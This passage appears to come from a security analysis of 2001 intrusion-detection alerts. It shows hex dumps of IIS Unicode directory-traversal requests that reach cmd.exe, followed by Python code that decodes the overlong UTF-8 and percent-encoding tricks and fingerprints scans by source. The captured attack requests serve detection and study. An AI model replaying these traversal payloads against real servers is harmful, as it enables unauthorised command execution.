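020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B   em32/cmd.exe?/c+
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A   dir HTTP/1.0....
#(1 - 2094) [2001-05-06 12:06:29] 56
000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 65 30   GET /msadc/..%e0
010 : 2E 2E 2F 2E 2E 66 2E 2E 2E 2E 2F 2E 2E 30 25 38   ../..f..../..0%8
020 : 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33   ../winnt/system3
030 : 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72   2/cmd.exe?/c+dir
040 : 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A             HTTP/1.0....
"""

def parse_alerts(text):
    """Yield (alert id, timestamp, payload bytes) for each '#(..)' record."""
    hdr, buf = None, bytearray()
    for line in text.splitlines():
        m = RECORD_HDR.match(line)
        if m:
            if hdr:
                yield (*hdr, bytes(buf))
            hdr, buf = m.groups(), bytearray()
        elif hdr and (m := DUMP_LINE.match(line)):
            buf += bytes.fromhex(m.group(1).replace(" ", ""))
    if hdr:
        yield (*hdr, bytes(buf))

def lenient_utf8(data, tricks):
    """Decode as a permissive server would, recording overlong and broken sequences."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        n = next((k for k, lo, hi in LEAD if lo <= b <= hi), 0)
        tail = data[i + 1:i + n]
        if b < 0x80:
            out.append(chr(b)); i += 1
        elif n and len(tail) == n - 1 and all(0x80 <= t <= 0xBF for t in tail):
            cp = b & (0x7F >> n)
            for t in tail:
                cp = (cp << 6) | (t & 0x3F)
            if cp < 0x80:                  # e.g. F0 80 80 AF collapses to '/'
                tricks.append(f"overlong-utf8-{n}byte")
            out.append(chr(cp) if cp < 0x110000 else "\ufffd"); i += n
        else:                              # lead byte without its continuation bytes
            tricks.append("malformed-utf8"); out.append("\ufffd"); i += 1
    return "".join(out)

def analyze(sid, when, payload):
    """Classify one request: decoded path, encoding tricks, and whether '..' survives."""
    target = (payload.split(b"\r\n", 1)[0].split(b" ") + [b"", b""])[1]
    raw_path = target.split(b"?", 1)[0]
    tricks = [name for name, rx in (("bad-percent-escape", BAD_PCT), ("percent-escape", PCT))
              if rx.search(raw_path)]
    decoded = PCT.sub(lambda m: bytes.fromhex(m.group(1).decode()), raw_path)
    path = lenient_utf8(decoded, tricks)
    return {"sid": sid, "when": when, "target": target.decode("ascii", "backslashreplace"),
            "path": path, "tricks": tricks, "traversal": ".." in path}

def fingerprint(text):
    """Ordered trick signature per request: compare these lists across scans."""
    return ["+".join(analyze(*rec)["tricks"]) or "plain" for rec in parse_alerts(text)]
```

Running fingerprint() over each of the four scans above gives one list per source; identical lists from different source addresses are the mechanical version of the observation in the post.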
